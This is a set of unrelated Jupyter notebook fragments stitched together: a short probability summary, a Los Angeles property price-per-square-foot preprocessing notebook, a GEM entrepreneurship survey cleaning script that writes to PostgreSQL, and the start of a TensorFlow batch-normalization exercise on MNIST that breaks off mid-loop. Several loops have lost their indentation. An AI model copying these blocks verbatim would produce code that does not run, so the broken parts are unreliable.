## Summary
We did some experiments summing $k$ random numbers: $S_k=x_1+x_2+\cdots+x_k$
$x_i=-1$ with probability $1/2$, $x_i=+1$ with probability $1/2$
Our experiments show that the sum $S_k$ is (almost) always in the range $\big[-4\sqrt{k},+4\sqrt{k}\big]$
$$\mbox{ If } k \to \infty,\;\;\; \frac{4 \sqrt{k}}{k} = \frac{4}{\sqrt{k}} \to 0$$
$$ \mbox{Therefore, if }\;\;k \to \infty, \frac{S_k}{k} \to 0$$
# What is probability theory?
It is the math involved in **proving** (a precise version of) the statements above.
In most cases, we can **approximate** probabilities using simulations (Monte-Carlo simulations)
Calculating the probabilities is better because:
* It provides a precise answer
* It is much faster than Monte Carlo simulations.
** <font size=4 > Up Next: What is Statistics ?</font> **
| github_jupyter |
```
# Data manipulation
import pandas as pd
import numpy as np
# Data Viz
import seaborn as sns
import matplotlib.pyplot as plt
%matplotlib inline
# More Data Preprocessing & Machine Learning
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler, normalize
import warnings
warnings.filterwarnings('ignore')
df = pd.read_csv('properties.csv')
```
## Initial Data Preprocessing
### Sanity Check
```
# TO DO: check uniqueness
print(df.id.nunique() == len(df))
print(df.AIN.nunique() == len(df))
# TO DO: check one level categorical features
df.isTaxableParcel.value_counts()
df = df.drop(['isTaxableParcel'], axis = 1)
# TO DO: remove features that are improper for modelling
df = df.drop(['id','AIN','AssessorID','SpecificUseType','CENTER_LAT','CENTER_LON','City','RollYear'], axis = 1)
df = df[(df.EffectiveYearBuilt != 0) | (df.LandBaseYear != 0)]
df = df[df.EffectiveYearBuilt >= df.YearBuilt.min()]
df = df[df.ImpBaseYear != 0]
```
### Feature Creation
```
# TO DO: create proportion-based features
# Total value = LandValue + ImprovementValue + FixtureValue + PersonalPropertyValue
df['LandValue_percent'] = df['LandValue']/df['TotalValue']
df['PersonalPropertyValue_percent'] = df['PersonalPropertyValue']/df['TotalValue']
df['TotalExemption_percent'] = df['TotalExemption']/df['TotalValue']
# Other proportion-based features
df['ZHVI_sf'] = df['ZHVI']/df['SQFTmain']
df['Bathroom_per_bedroom'] = df['Bathrooms']/df['Bedrooms']
df['Price_per_unit'] = df['TotalValue']/df['Units']
# TO DO: aviod multicolinearity
df = df.drop(['LandValue','ImprovementValue','PersonalPropertyValue','TotalExemption','SQFTmain','Bathrooms'], axis = 1)
# TO DO: create difference-based features
df['years_until_effective'] = df['EffectiveYearBuilt'] - df['YearBuilt']
df = df.drop(['EffectiveYearBuilt'], axis = 1)
df['BaseYear_difference'] = df['ImpBaseYear'] - df['LandBaseYear']
df = df.drop(['ImpBaseYear'], axis = 1)
# TO DO: aviod multicolinearity
# Total exemption value = HomeownersExemption + RealEstateExemption + FixtureExemption + PersonalPropertyExemption
df = df.drop(['FixtureExemption','PersonalPropertyExemption'], axis = 1)
# TotalLandImpValue = LandValue + ImprovementValue
df = df.drop(['Cluster','TotalLandImpValue','RecordingDate','netTaxableValue'], axis = 1)
# TO DO: create a identifier for EDA
df['school_district'] = 'ucla'
df['school_district'][df.distance_to_usc<=3] = 'usc'
```
### Missing Values Management
```
def plot_NA(dataframe, benchmark, bins):
    """Visualise and print missing-value statistics per column and per row.

    Draws two side-by-side plots: a horizontal bar chart of the NA
    percentage per feature (bars at/above `benchmark` shown in red) and
    a histogram of the number of NAs per row.

    NOTE(review): this function intentionally mutates `dataframe` by
    adding an 'NA_this_row' column (the notebook drops it afterwards) —
    confirm callers expect this side effect.

    Parameters:
        dataframe: pandas DataFrame to inspect (mutated, see note).
        benchmark: NA-percentage threshold used to colour/flag features.
        bins: number of bins for the per-row NA histogram.
    """
    ## Assessing Missing Values per Column
    # Percentage of missing values for each feature.
    na_info = dataframe.isnull().sum()/len(dataframe)*100
    na_info = na_info.sort_values(0, ascending=True).reset_index()
    na_info.columns = ['feature','% of NA']
    # Flag features whose NA percentage meets or exceeds the benchmark.
    na_info['higher than benchmark'] = (na_info['% of NA']>= benchmark)
    fig, (ax1, ax2) = plt.subplots(1,2, figsize=(16,5))
    # Red bars mark flagged features, skyblue the rest.
    colours = {True: "red", False: "skyblue"}
    na_info.plot('feature','% of NA',kind='barh', color=na_info['higher than benchmark'].replace(colours),ax=ax1)
    # Dashed vertical line showing the benchmark threshold.
    ax1.vlines(x=benchmark, ymin=0, ymax=100, color='red', linestyles='dashed')
    ax1.set_title('Distribution of % of Missing Values per Feature')
    ax1.set_ylabel('feature')
    ax1.set_xlabel('% of NA')
    ax1.get_legend().remove()
    print('NAs per Feature:')
    print(na_info,end='\n\n')
    ## Assessing Missing Values per Row
    dataframe['NA_this_row'] = dataframe.isna().sum(axis=1) # the number of NA values per row
    ax2.hist(dataframe['NA_this_row'], bins=bins)
    ax2.set_title('Distribution of Amount of Missing Values per Row')
    ax2.set_xlabel('Missing Values per Row')
    ax2.set_ylabel('Number of Records')
    # Share of rows per NA-count value.
    temp = dataframe['NA_this_row'].value_counts(normalize=True)
    print('NAs per Row:')
    print('count percent')
    print(temp)
## TO DO: Assess missing values by columns and rows
plot_NA(df, benchmark=5, bins=5)
## TO DO: fill missing values (NAs or inf) with -1
df['Bathroom_per_bedroom'].fillna(value=-1, inplace=True)
df['Bathroom_per_bedroom'][df.Bathroom_per_bedroom == np.inf] = -1
df['Price_per_unit'][df.Price_per_unit == np.inf] = -1
```
Obviously, the NAs in *Bathroom_per_bedroom* and *Price_per_unit* due to zero denominator. Rather than simply remove those properties, here we mark those missing values specially as -1 to avoid introducing any bias or losing information.
```
df = df.drop('NA_this_row', axis=1)
```
### Handle Outliers
```
## TO DO: detect outliers through extreme values
df.describe().T
# Identify outliers as data points falling outside Z standard deviations
def replace_outliers_z_score(dataframe, column, Z=3):
    """Fill NaNs and replace z-score outliers in `column` with a robust mean.

    The replacement mean is computed after excluding rows whose z-score
    falls outside [-Z, Z], so extreme values do not drag it.  Unlike the
    original version, the caller's dataframe is NOT mutated and no
    temporary "zscore" column leaks into it.

    Parameters
    ----------
    dataframe : pandas.DataFrame
        Input data (left unmodified).
    column : str
        Name of the numeric column to clean.
    Z : float, default 3
        Z-score threshold beyond which a value counts as an outlier.

    Returns
    -------
    pandas.DataFrame
        Copy of `dataframe` with NaNs filled and outliers replaced.
    """
    from scipy.stats import zscore

    # Work on a copy so the caller's frame keeps its original values.
    result = dataframe.copy(deep=True)

    # Mean computed on non-missing, non-outlier rows only.
    valid = result.dropna(subset=[column]).copy()
    valid["zscore"] = zscore(valid[column])
    mean_ = valid[(valid["zscore"] > -Z) & (valid["zscore"] < Z)][column].mean()

    # Fill missing values with the robust mean.
    n_missing = result[column].isnull().sum()
    result[column] = result[column].fillna(mean_)

    # Replace outliers (z-scores recomputed on the filled column).
    z = zscore(result[column])
    outlier_mask = (z < -Z) | (z > Z)
    result.loc[outlier_mask, column] = mean_

    # The original message printed the NaN count but labelled it
    # "outliers"; report both quantities accurately instead.
    print("Filled:", n_missing, "NaNs and replaced:",
          int(outlier_mask.sum()), "outliers in", column)
    return result
## TO DO: replace potential outliers with mean
cat_cols = df.select_dtypes(['int','float']).columns.values
i = 1
for col in cat_cols:
df = replace_outliers_z_score(df,col)
```
## EDA
```
## TO DO: correct feature types
df.zip2 = df.zip2.astype('int')
df.zip2 = df.zip2.astype('object')
df.YearBuilt = df.YearBuilt.astype('object')
df.AdministrativeRegion = df.AdministrativeRegion.astype('object')
df.PropertyType = df.PropertyType.astype('object')
# TO DO: Calculate correlation of features for UCLA district
correlation = df[df.school_district=='ucla'].corr()
mask = np.zeros_like(correlation)
mask[np.triu_indices_from(mask)] = True
# Plot correlation
plt.figure(figsize=(18,18))
sns.heatmap(correlation, mask=mask, cmap="RdBu_r",xticklabels=correlation.columns.values, yticklabels=correlation.columns.values, annot = True, annot_kws={'size':10})
# Axis ticks size
plt.xticks(fontsize=10)
plt.yticks(fontsize=10)
plt.show()
```
All of the correlation coefficients are less than 0.95, no significant multicolinearity.
```
# TO DO: Calculate correlation of features for USC district
correlation = df[df.school_district=='usc'].corr()
mask = np.zeros_like(correlation)
mask[np.triu_indices_from(mask)] = True
# Plot correlation
plt.figure(figsize=(18,18))
sns.heatmap(correlation, mask=mask, cmap="RdBu_r",xticklabels=correlation.columns.values, yticklabels=correlation.columns.values, annot = True, annot_kws={'size':10})
# Axis ticks size
plt.xticks(fontsize=10)
plt.yticks(fontsize=10)
plt.show()
```
All of the correlation coefficients are less than 0.95, no significant multicolinearity.
```
# TO DO: remove geographic identifier for EDA
df_clean = df.drop('PropertyLocation',axis=1)
# TO DO: plot categorical features
plt.figure(figsize=(12, 12))
cat_cols = df_clean.select_dtypes(['object']).columns.values
i = 1
for col in cat_cols:
plt.subplot(2, 2, i)
sns.countplot(y=df_clean[col],hue='school_district',data=df_clean)
plt.xticks()
plt.tick_params(labelbottom=True)
i += 1
plt.tight_layout()
# TO DO: plot numerical features
plt.figure(figsize=(15, 13))
cat_cols = df_clean.select_dtypes(['int64']).columns.values
i = 1
for col in cat_cols:
plt.subplot(4, 3, i)
sns.histplot(x=df_clean[col],kde=True, hue='school_district',data=df_clean)
#res = stats.probplot(df_clean[col], plot=plt)
#sns.boxplot(y=df_clean['price_sf'],x=col, data=df_clean ,color='green')
plt.xticks(rotation=0)
plt.tick_params()
i += 1
plt.tight_layout()
```
YearBuilt shows distinct pattern, properties in UCLA district are younger than those in USC district overall. UCLA district shows higher ZHVI.
```
# TO DO: plot numerical float features
plt.figure(figsize=(10, 10))
cat_cols = df_clean.select_dtypes(['float']).columns.values
i = 1
for col in cat_cols:
#plt.subplot(4, 4, i)
sns.displot(x=df_clean[col], hue='school_district',data=df_clean)
#res = stats.probplot(df_clean[col], plot=plt)
#sns.boxplot(y=df_clean['price_sf'],x=col, data=df_clean ,color='green')
plt.xticks(rotation=0)
plt.tick_params()
i += 1
plt.tight_layout()
df_clean.info()
```
## Feature Engineering
### One-hot Encoding
```
df_clean.head().T
# TO DO: drop some multivariate features for computational simplicity
df_clean = df_clean.drop(['LandBaseYear', 'RecordingDateYear'],axis=1)
## TO DO: separate the one-hot dataset for two schools
df_ucla = df_clean[df_clean.school_district == 'ucla']
df_ucla = df_ucla.drop('school_district',axis=1)
df_usc = df_clean[df_clean.school_district == 'usc']
df_usc = df_usc.drop('school_district',axis=1)
# TO DO: Create dummy variables for ucla
cat1 = pd.get_dummies(df_ucla.zip2, prefix = "zip")
cat2 = pd.get_dummies(df_ucla.AdministrativeRegion, prefix = "Region")
cat3 = pd.get_dummies(df_ucla.PropertyType, prefix = "PropertyType")
cat4 = pd.get_dummies(df_ucla.YearBuilt, prefix = "YearBuilt")
#cat5 = pd.get_dummies(df_clean.LandBaseYear, prefix = "LandBaseYear")
#cat6 = pd.get_dummies(df_clean.RecordingDateYear, prefix = "RecordingDateYear")
# TO DO: Merge dummy variables to main dataframe
ucla_hot = pd.concat([df_ucla,cat1], axis=1)
ucla_hot = pd.concat([ucla_hot,cat2], axis=1)
ucla_hot = pd.concat([ucla_hot,cat3], axis=1)
ucla_hot = pd.concat([ucla_hot,cat4], axis=1)
#df_hot = pd.concat([df_hot,cat5], axis=1)
#df_hot = pd.concat([df_hot,cat6], axis=1)
# TO DO: Correct the data type
for cat in [cat1,cat2, cat3, cat4]:
cat_cols = cat.columns
for col in cat_cols:
ucla_hot[col] = ucla_hot[col].astype("category")
# TO DO: drop original features
ucla_hot = ucla_hot.drop(["zip2","PropertyType","YearBuilt","zip_90057"], axis=1)
ucla_hot.head().T
# TO DO: Create dummy variables for ucla
cat1 = pd.get_dummies(df_usc.zip2, prefix = "zip")
cat2 = pd.get_dummies(df_usc.AdministrativeRegion, prefix = "Region")
cat3 = pd.get_dummies(df_usc.PropertyType, prefix = "PropertyType")
cat4 = pd.get_dummies(df_usc.YearBuilt, prefix = "YearBuilt")
#cat5 = pd.get_dummies(df_clean.LandBaseYear, prefix = "LandBaseYear")
#cat6 = pd.get_dummies(df_clean.RecordingDateYear, prefix = "RecordingDateYear")
# TO DO: Merge dummy variables to main dataframe
usc_hot = pd.concat([df_usc,cat1], axis=1)
usc_hot = pd.concat([usc_hot,cat2], axis=1)
usc_hot = pd.concat([usc_hot,cat3], axis=1)
usc_hot = pd.concat([usc_hot,cat4], axis=1)
#df_hot = pd.concat([df_hot,cat5], axis=1)
#df_hot = pd.concat([df_hot,cat6], axis=1)
# TO DO: Correct the data type
for cat in [cat1,cat2, cat3, cat4]:
cat_cols = cat.columns
for col in cat_cols:
usc_hot[col] = usc_hot[col].astype("category")
# TO DO: drop original features
usc_hot = usc_hot.drop(["zip2","PropertyType","YearBuilt","zip_90023", "zip_90063"], axis=1)
usc_hot.head().T
```
### Data Scaling
for ucla
```
# TO DO: split the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_ucla = ucla_hot.drop(['price_sf'], axis = 1)
y_ucla = ucla_hot['price_sf']
X_train, X_test, y_train, y_test = train_test_split(X_ucla, y_ucla, test_size = 0.2, random_state = 99)
# TO DO: separate numerical and categorical features
X_train_num = X_train.select_dtypes(['int','float'])
X_train_cat = X_train.select_dtypes(['category'])
X_test_num = X_test.select_dtypes(['int','float'])
X_test_cat = X_test.select_dtypes(['category'])
# TO DO: standardize the data for UCLA
from sklearn.preprocessing import StandardScaler
scaler_ucla = StandardScaler()
X_train_num_scaled = pd.DataFrame(scaler_ucla.fit_transform(X_train_num))
X_train_num_scaled.columns = X_train_num.columns
X_train_num_scaled.index = X_train_num.index
X_test_num_scaled = pd.DataFrame(scaler_ucla.transform(X_test_num))
X_test_num_scaled.columns = X_test_num.columns
X_test_num_scaled.index = X_test_num.index
# TO DO: combine the scaled the part with categorical features
X_train_ucla_scaled = pd.concat([X_train_num_scaled,X_train_cat.sort_index()], axis=1)
X_test_ucla_scaled = pd.concat([X_test_num_scaled,X_test_cat.sort_index()], axis=1)
# TO DO: scale the target
scaler_y_ucla = StandardScaler()
y_train_ucla_scaled = scaler_y_ucla.fit_transform(y_train.values.reshape(-1, 1))
y_test_ucla_scaled = scaler_y_ucla.transform(y_test.values.reshape(-1, 1))
```
for usc
```
# Split the USC dataset into training and test sets (80/20)
from sklearn.model_selection import train_test_split
X_usc = usc_hot.drop(['price_sf'], axis = 1)
y_usc = usc_hot['price_sf']
X_train, X_test, y_train, y_test = train_test_split(X_usc, y_usc, test_size = 0.2, random_state = 99)
# Separate numerical and categorical features by dtype
X_train_num = X_train.select_dtypes(['int','float'])
X_train_cat = X_train.select_dtypes(['category'])
X_test_num = X_test.select_dtypes(['int','float'])
X_test_cat = X_test.select_dtypes(['category'])
# Standardize the numeric features for USC: fit on train, transform test
from sklearn.preprocessing import StandardScaler
scaler_usc = StandardScaler()
X_train_num_scaled = pd.DataFrame(scaler_usc.fit_transform(X_train_num))
X_train_num_scaled.columns = X_train_num.columns
X_train_num_scaled.index = X_train_num.index
X_test_num_scaled = pd.DataFrame(scaler_usc.transform(X_test_num))
X_test_num_scaled.columns = X_test_num.columns
X_test_num_scaled.index = X_test_num.index
# Recombine the scaled numeric part with the categorical features
# (concat aligns on the shared index, so rows stay matched).
X_train_usc_scaled = pd.concat([X_train_num_scaled,X_train_cat.sort_index()], axis=1)
X_test_usc_scaled = pd.concat([X_test_num_scaled,X_test_cat.sort_index()], axis=1)
# Scale the target with its own scaler for later inverse transformation
scaler_y_usc = StandardScaler()
y_train_usc_scaled = scaler_y_usc.fit_transform(y_train.values.reshape(-1, 1))
y_test_usc_scaled = scaler_y_usc.transform(y_test.values.reshape(-1, 1))
```
### Output for Modelling
```
# Persist the scaled train/test splits so the separate modelling
# notebook can consume them without re-running the preprocessing.
X_train_ucla_scaled.to_csv('X_train_ucla.csv')
X_test_ucla_scaled.to_csv('X_test_ucla.csv')
pd.DataFrame(y_train_ucla_scaled).to_csv('y_train_ucla.csv')
pd.DataFrame(y_test_ucla_scaled).to_csv('y_test_ucla.csv')
X_train_usc_scaled.to_csv('X_train_usc.csv')
X_test_usc_scaled.to_csv('X_test_usc.csv')
pd.DataFrame(y_train_usc_scaled).to_csv('y_train_usc.csv')
pd.DataFrame(y_test_usc_scaled).to_csv('y_test_usc.csv')
```
## Results Analysis (after modelling)
for ucla
```
# Import predicted results of our best model (SVR), produced by the
# separate modelling notebook.
y_pred_ucla = pd.read_csv('y_pred_svr_ucla.csv')
y_pred_ucla = y_pred_ucla.drop('Unnamed: 0',axis=1)
y_pred_usc = pd.read_csv('y_pred_svr_usc.csv')
y_pred_usc = y_pred_usc.drop('Unnamed: 0',axis=1)
# Transform the scaled predictions back to price_sf units and re-attach
# the test-set row index so they can be merged with property info.
y_pred_ucla = pd.DataFrame(scaler_y_ucla.inverse_transform(y_pred_ucla))
y_pred_ucla.index = X_test_ucla_scaled.index
y_pred_usc = pd.DataFrame(scaler_y_usc.inverse_transform(y_pred_usc))
y_pred_usc.index = X_test_usc_scaled.index
# Obtain the full properties info (location and actual price per sqft)
fullset = df[['PropertyLocation','price_sf']]
# Expected value of the scaled-target model for ucla (inverse transform of 0)
scaler_y_ucla.inverse_transform(np.zeros((9541, 1)))[0]
# Combine ucla price outputs with property location (inner join on index)
ucla_result = pd.merge(fullset,y_pred_ucla,left_index=True,right_index=True)
ucla_result = ucla_result.rename(columns={0:'price_hat'})
# Naive adjustment: triple the (predicted - actual) spread
ucla_result['price_hat_adjusted'] = (ucla_result['price_hat'] - ucla_result['price_sf'] )*3 # naive adjustment
ucla_opp = ucla_result[ucla_result.price_hat_adjusted >= 553].sort_values('price_hat_adjusted')
ucla_opp
# Opportunity density: share of listings flagged as opportunities
len(ucla_opp)/len(ucla_result)
```
for USC
```
# Expected value of the scaled-target model for usc (inverse transform of 0)
scaler_y_usc.inverse_transform(np.zeros((9541, 1)))[0]
# Combine usc price outputs with property location (inner join on index)
usc_result = pd.merge(fullset,y_pred_usc,left_index=True,right_index=True)
usc_result = usc_result.rename(columns={0:'price_hat'})
# Naive adjustment: triple the (predicted - actual) spread
usc_result['price_hat_adjusted'] = (usc_result['price_hat'] - usc_result['price_sf'] )*3
usc_opp = usc_result[usc_result.price_hat_adjusted>242].sort_values('price_hat_adjusted')
usc_opp
# Opportunity density: share of listings flagged as opportunities
len(usc_opp)/len(usc_result)
# Opportunity exploration (example filter by location substring)
# ucla_result[ucla_result.price_hat_adjusted>700][ucla_result['PropertyLocation'].str.find('SANTA ') != -1]
```
| github_jupyter |
### Dependencies for the Project
```
import pandas as pd
from sqlalchemy import create_engine, inspect
from db_config import password
import psycopg2
```
### Importing the CSV file for Behavior and Attitudes
```
# Load the GEM "Behavior and Attitudes" survey extract
file = "./Resources/Behavior_and_Attitudes.csv"
Behavior_and_Attitudes= pd.read_csv(file)
Behavior_and_Attitudes.head()
```
### Exploring the Database
#### No of unique countries in the Survey
```
print(f"No of unique countries in the survey : {len(Behavior_and_Attitudes['economy'].unique())}")
```
#### Understanding the Number of economies every year.
We can see that not every country has been surveyed in every year. 2001 was the year with the fewest countries (28) in the survey, while 2013 and 2014 had 70 countries participating. The latest year, 2019, has 50 economies surveyed.
```
Behavior_and_Attitudes["year"].value_counts()
```
#### Null Values
The dataset has null values in certain columns, as identified below. The columns with null values are:
1. Fear of failure rate *
2. Entrepreneurial intentions
3. Established Business Ownership
4. Entrepreneurial Employee Activity
5. Motivational Index
6. Female/Male Opportunity-Driven TEA
7. High Job Creation Expectation
8. Innovation
9. Business Services Sector
10. High Status to Successful Entrepreneurs
11. Entrepreneurship as a Good Career Choice
```
# Identify missing values: non-null counts per column
Behavior_and_Attitudes.count()
```
### Fear of failure rate--dealing with null value
```
# Fear of failure rate has just one null value; identify the row (economy) with it
Behavior_and_Attitudes.loc[Behavior_and_Attitudes["Fear of failure rate *"].isna()]
# Pull all the data points related to Venezuela for context
Behavior_and_Attitudes.loc[Behavior_and_Attitudes["economy"]=="Venezuela"]
```
#### Treating the one null value in Fear of Failure rate
Since there are five data points for Venezuela, the one null value can be filled with the mean of the four other fear of failure rate values.
```
# Calculate the mean fear of failure rate for Venezuela over the non-null
# years (excluding 2007, the year with the missing value)
mean_ffrate=Behavior_and_Attitudes.loc[(Behavior_and_Attitudes["economy"]=="Venezuela") & (Behavior_and_Attitudes["year"]!=2007),:]["Fear of failure rate *"].mean()
print(f"The data is updated with the mean value {mean_ffrate}")
# Fill the single null with that mean (only Venezuela/2007 is null, so
# the frame-wide fillna touches exactly one cell)
Behavior_and_Attitudes["Fear of failure rate *"]=Behavior_and_Attitudes["Fear of failure rate *"].fillna(mean_ffrate)
# Display the DF with the changes made
Behavior_and_Attitudes.loc[Behavior_and_Attitudes["economy"]=="Venezuela"]
```
### Entrepreneurial intentions--dealing with null values
The economies that were surveyed in 2001 might not have had questions on entrepreneurial intentions, hence the data point is null for all 28 economies.
```
# Identify the rows with null Entrepreneurial intentions (all 28 economies from 2001)
Behavior_and_Attitudes.loc[Behavior_and_Attitudes["Entrepreneurial intentions"].isna()]
```
### Established Business Ownership- null values
Replaced the single value with the closest data point.
```
Behavior_and_Attitudes.loc[Behavior_and_Attitudes['Established Business Ownership'].isna()]
Behavior_and_Attitudes.loc[Behavior_and_Attitudes['economy']=='Israel']
# Replace with the closest value.
# NOTE(review): 5.66 is hard-coded — presumably Israel's nearest-year
# Established Business Ownership value; confirm against the data above.
Behavior_and_Attitudes["Established Business Ownership"]=Behavior_and_Attitudes["Established Business Ownership"].fillna(5.66)
Behavior_and_Attitudes.loc[Behavior_and_Attitudes['economy']=='Israel']
```
### Entrepreneurial employee activity, Motivational Index , Female/Male Opportunity-Driven TEA ,Innovation,High Status to Successful Entrepreneurs, Entrepreneurship as a Good Career Choice, Business Services Sector, High Job Creation Expectation --missing values
These columns have more than 100 missing values and will be only used for plotting purposes.
```
# Report the missing-value counts for the sparse columns (left as-is;
# they are only used for plotting)
print(f"Missing values in Entrepreneurial Employee Activity is :{len(Behavior_and_Attitudes.loc[Behavior_and_Attitudes['Entrepreneurial Employee Activity'].isna()])}")
print(f"Missing values in Motivational Index is :{len(Behavior_and_Attitudes.loc[Behavior_and_Attitudes['Motivational Index'].isna()])}")
print(f"Missing values in Female/Male Opportunity-Driven TEA is :{len(Behavior_and_Attitudes.loc[Behavior_and_Attitudes['Female/Male Opportunity-Driven TEA'].isna()])}")
print(f"Missing values in Innovation is :{len(Behavior_and_Attitudes.loc[Behavior_and_Attitudes['Innovation'].isna()])}")
print(f"Missing values in High Status to Successful Entrepreneurs is :{len(Behavior_and_Attitudes.loc[Behavior_and_Attitudes['High Status to Successful Entrepreneurs'].isna()])}")
print(f"Missing values in Entrepreneurship as a Good Career Choice is :{len(Behavior_and_Attitudes.loc[Behavior_and_Attitudes['Entrepreneurship as a Good Career Choice'].isna()])}")
print(f"Missing values in Business Services Sector is :{len(Behavior_and_Attitudes.loc[Behavior_and_Attitudes['Business Services Sector'].isna()])}")
print(f"Missing values in High Job Creation Expectation is :{len(Behavior_and_Attitudes.loc[Behavior_and_Attitudes['High Job Creation Expectation'].isna()])}")
```
### Changing column names
```
# Replace spaces in column names with underscores so they are valid SQL identifiers
Behavior_and_Attitudes.columns = Behavior_and_Attitudes.columns.str.replace(' ','_')
Behavior_and_Attitudes.head()
Behavior_and_Attitudes=Behavior_and_Attitudes.rename(columns={"economy":"country"})
Behavior_and_Attitudes.head()
Behavior_and_Attitudes=Behavior_and_Attitudes.rename(columns={"Fear_of_failure_rate_*":"Fear_of_failure_rate"})
Behavior_and_Attitudes.head()
Behavior_and_Attitudes=Behavior_and_Attitudes.rename(columns={"Total_early-stage_Entrepreneurial_Activity_(TEA)":"Total_early_stage_Entrepreneurial_Activity"})
Behavior_and_Attitudes=Behavior_and_Attitudes.rename(columns={"Female/Male_TEA":"Female_Male_TEA"})
Behavior_and_Attitudes=Behavior_and_Attitudes.rename(columns={"Female/Male_Opportunity-Driven_TEA":"Female_Male_Opportunity_Driven_TEA"})
Behavior_and_Attitudes.head()
# Connect to the default "postgres" database to check whether gem_db exists
conn = psycopg2.connect(
    database="postgres", user="postgres", password=f"{password}", host='127.0.0.1', port= '5432'
)
conn.autocommit = True  # CREATE DATABASE cannot run inside a transaction
cursor = conn.cursor()
cursor.execute("SELECT datname FROM pg_database;")
list_database = cursor.fetchall()
dbname = "gem_db"
# try:
if (dbname,) not in list_database:
    cur = conn.cursor()
    cur.execute('CREATE DATABASE ' + dbname)
    cur.close()
    conn.close()
    print("Creating Database...")
    # Load the cleaned dataframe into the new database via SQLAlchemy
    engine = create_engine(f"postgresql://postgres:{password}@localhost:5432/{dbname}")
    connection = engine.connect()
    print('-'*30)
    print("Creating Tables, Please wait...")
    print('-'*30)
    Behavior_and_Attitudes.to_sql("behavior_and_attitudes",engine)
    print("Table Behavior_and_Attitudes created successfully")
    connection.close()
    print('-'*30)
    print("Database is ready to use.")
else:
    # NOTE(review): conn is left open on this branch, and the table is not
    # (re)created — an existing gem_db is assumed to already hold the table.
    print("Database is already exists.")
# except:
#     print("Something went wrong.")
```
### Getting only the recent data for geoJSON conversion
```
# Keep only the 2019 survey rows for the geoJSON conversion
data_2019=Behavior_and_Attitudes.loc[Behavior_and_Attitudes["year"]==2019]
data_2019.count()
# Drop every column that still contains nulls for 2019
data_2019=data_2019.dropna( axis=1,how='any')
data_2019.count()
data_2019
data_2019.to_csv('Resources/behavior_and_attitudes_2019.csv',index=False)
```
| github_jupyter |
# Batch Normalization – Practice
Batch normalization is most useful when building deep neural networks. To demonstrate this, we'll create a convolutional neural network with 20 convolutional layers, followed by a fully connected layer. We'll use it to classify handwritten digits in the MNIST dataset, which should be familiar to you by now.
This is **not** a good network for classifying MNIST digits. You could create a _much_ simpler network and get _better_ results. However, to give you hands-on experience with batch normalization, we had to make an example that was:
1. Complicated enough that training would benefit from batch normalization.
2. Simple enough that it would train quickly, since this is meant to be a short exercise just to give you some practice adding batch normalization.
3. Simple enough that the architecture would be easy to understand without additional resources.
This notebook includes two versions of the network that you can edit. The first uses higher level functions from the `tf.layers` package. The second is the same network, but uses only lower level functions in the `tf.nn` package.
1. [Batch Normalization with `tf.layers.batch_normalization`](#example_1)
2. [Batch Normalization with `tf.nn.batch_normalization`](#example_2)
The following cell loads TensorFlow, downloads the MNIST dataset if necessary, and loads it into an object named `mnist`. You'll need to run this cell before running anything else in the notebook.
```
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
# Download (if needed) and load MNIST; one-hot labels, images kept as 28x28x1
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True, reshape=False)
```
# Batch Normalization using `tf.layers.batch_normalization`<a id="example_1"></a>
This version of the network uses `tf.layers` for almost everything, and expects you to implement batch normalization using [`tf.layers.batch_normalization`](https://www.tensorflow.org/api_docs/python/tf/layers/batch_normalization)
We'll use the following function to create fully connected layers in our network. We'll create them with the specified number of neurons and a ReLU activation function.
This version of the function does not include batch normalization.
```
"""
DO NOT MODIFY THIS CELL
"""
def fully_connected(prev_layer, num_units):
"""
Create a fully connectd layer with the given layer as input and the given number of neurons.
:param prev_layer: Tensor
The Tensor that acts as input into this layer
:param num_units: int
The size of the layer. That is, the number of units, nodes, or neurons.
:returns Tensor
A new fully connected layer
"""
layer = tf.layers.dense(prev_layer, num_units, activation=tf.nn.relu)
return layer
```
We'll use the following function to create convolutional layers in our network. They are very basic: we're always using a 3x3 kernel, ReLU activation functions, strides of 1x1 on layers with odd depths, and strides of 2x2 on layers with even depths. We aren't bothering with pooling layers at all in this network.
This version of the function does not include batch normalization.
```
"""
DO NOT MODIFY THIS CELL
"""
def conv_layer(prev_layer, layer_depth):
"""
Create a convolutional layer with the given layer as input.
:param prev_layer: Tensor
The Tensor that acts as input into this layer
:param layer_depth: int
We'll set the strides and number of feature maps based on the layer's depth in the network.
This is *not* a good way to make a CNN, but it helps us create this example with very little code.
:returns Tensor
A new convolutional layer
"""
strides = 2 if layer_depth % 3 == 0 else 1
conv_layer = tf.layers.conv2d(prev_layer, layer_depth*4, 3, strides, 'same', activation=tf.nn.relu)
return conv_layer
```
**Run the following cell**, along with the earlier cells (to load the dataset and define the necessary functions).
This cell builds the network **without** batch normalization, then trains it on the MNIST dataset. It displays loss and accuracy data periodically while training.
```
"""
DO NOT MODIFY THIS CELL
"""
def train(num_batches, batch_size, learning_rate):
# Build placeholders for the input samples and labels
inputs = tf.placeholder(tf.float32, [None, 28, 28, 1])
labels = tf.placeholder(tf.float32, [None, 10])
# Feed the inputs into a series of 20 convolutional layers
layer = inputs
for layer_i in range(1, 20):
layer = conv_layer(layer, layer_i)
# Flatten the output from the convolutional layers
orig_shape = layer.get_shape().as_list()
layer = tf.reshape(layer, shape=[-1, orig_shape[1] * orig_shape[2] * orig_shape[3]])
# Add one fully connected layer
layer = fully_connected(layer, 100)
# Create the output layer with 1 node for each
logits = tf.layers.dense(layer, 10)
# Define loss and training operations
model_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=labels))
train_opt = tf.train.AdamOptimizer(learning_rate).minimize(model_loss)
# Create operations to test accuracy
correct_prediction = tf.equal(tf.argmax(logits,1), tf.argmax(labels,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# Train and test the network
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for batch_i in range(num_batches):
batch_xs, batch_ys = mnist.train.next_batch(batch_size)
# train this batch
sess.run(train_opt, {inputs: batch_xs, labels: batch_ys})
# Periodically check the validation or training loss and accuracy
if batch_i % 100 == 0:
loss, acc = sess.run([model_loss, accuracy], {inputs: mnist.validation.images,
labels: mnist.validation.labels})
print('Batch: {:>2}: Validation loss: {:>3.5f}, Validation accuracy: {:>3.5f}'.format(batch_i, loss, acc))
elif batch_i % 25 == 0:
loss, acc = sess.run([model_loss, accuracy], {inputs: batch_xs, labels: batch_ys})
